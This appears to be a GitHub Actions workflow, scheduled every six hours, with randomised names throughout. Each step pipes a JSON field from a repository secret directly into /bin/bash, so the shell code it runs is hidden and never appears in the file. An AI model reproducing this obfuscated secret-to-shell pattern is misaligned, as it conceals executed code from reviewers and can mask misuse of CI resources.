name: xiaoyongsha
on:
  workflow_dispatch:
  schedule:
    - cron: '39 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiaoyongsha
        env:
          mpf88226: ${{ secrets.mpf88226 }}
        run: |
          echo $mpf88226 | jq -r .aeg537 | /bin/bash
          echo $pqzhx31343 | jq -r .fcnfi98 | /bin/bash
          echo $sdn31 | jq -r .o95468 | /bin/bash
          echo $ll40171 | jq -r .cgjt4449 | /bin/bash
          echo $vdlod2 | jq -r .n99549 | /bin/bash
          echo $cszw88566 | jq -r .voyqj59741 | /bin/bash
          echo $eny03396 | jq -r .sw9 | /bin/bash
          echo $q01 | jq -r .g5695 | /bin/bash
          echo $jppn5447 | jq -r .ppzeo7 | /bin/bash
          echo $cdun8 | jq -r .hpy41 | /bin/bash
          echo $qvu888 | jq -r .uqfvx51122 | /bin/bash
          echo $qmi4 | jq -r .n02273 | /bin/bash
          echo $yshdx12 | jq -r .hwic5 | /bin/bash
          echo $bqfqv749 | jq -r .m7 | /bin/bash

